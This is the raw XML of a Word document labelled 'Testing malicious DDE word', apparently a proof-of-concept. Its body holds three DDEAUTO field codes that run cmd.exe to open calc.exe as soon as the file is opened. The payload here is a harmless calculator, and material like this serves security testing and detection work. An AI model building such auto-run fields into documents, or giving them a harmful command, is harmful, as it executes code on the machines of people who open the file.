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D01CF" w14:textId="77777777" w:rsidR="00166E7F" w:rsidRDefault="00145998">
      <w:r>
        <w:t>Testing malicious DDE word</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBAE906" w14:textId="565CF856" w:rsidR="00D97ED6" w:rsidRDefault="00D97ED6">
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00D97ED6">
        <w:instrText>DDEAUTO "C:\\Windows\\System32\\cmd.exe" "/c calc.exe"</w:instrText>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6E9680" w14:textId="74C617AE" w:rsidR="00145998" w:rsidRDefault="000E1BBE">
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidRPr="000E1BBE">
        <w:instrText>DDEAUTO "C:\\Windows\\System32\\cmd.exe" "/c calc.exe"</w:instrText>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00503674">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00503674" w:rsidRPr="00503674">
        <w:instrText>DDEAUTO "C:\\Windows\\System32\\cmd.exe" "/c calc.exe"</w:instrText>
      </w:r>
      <w:r w:rsidR="00503674">
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00503674">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00503674">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0014599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998"/>
    <w:rsid w:val="000E1BBE"/>
    <w:rsid w:val="00145998"/>
    <w:rsid w:val="00166E7F"/>
    <w:rsid w:val="003D5C23"/>
    <w:rsid w:val="00503674"/>
    <w:rsid w:val="005D0FC5"/>
    <w:rsid w:val="009A1FEA"/>
    <w:rsid w:val="00CA1FAE"/>
    <w:rsid w:val="00D97ED6"/>
    <w:rsid w:val="00F46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685FC"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A2636D30-E64C-4887-9CDA-BBD69D1D8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9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9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9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9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9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9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9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9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9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9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hazim</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>amir hazim</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-05T06:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-05T06:07:00Z</dcterms:modified>
</cp:coreProperties>
</file>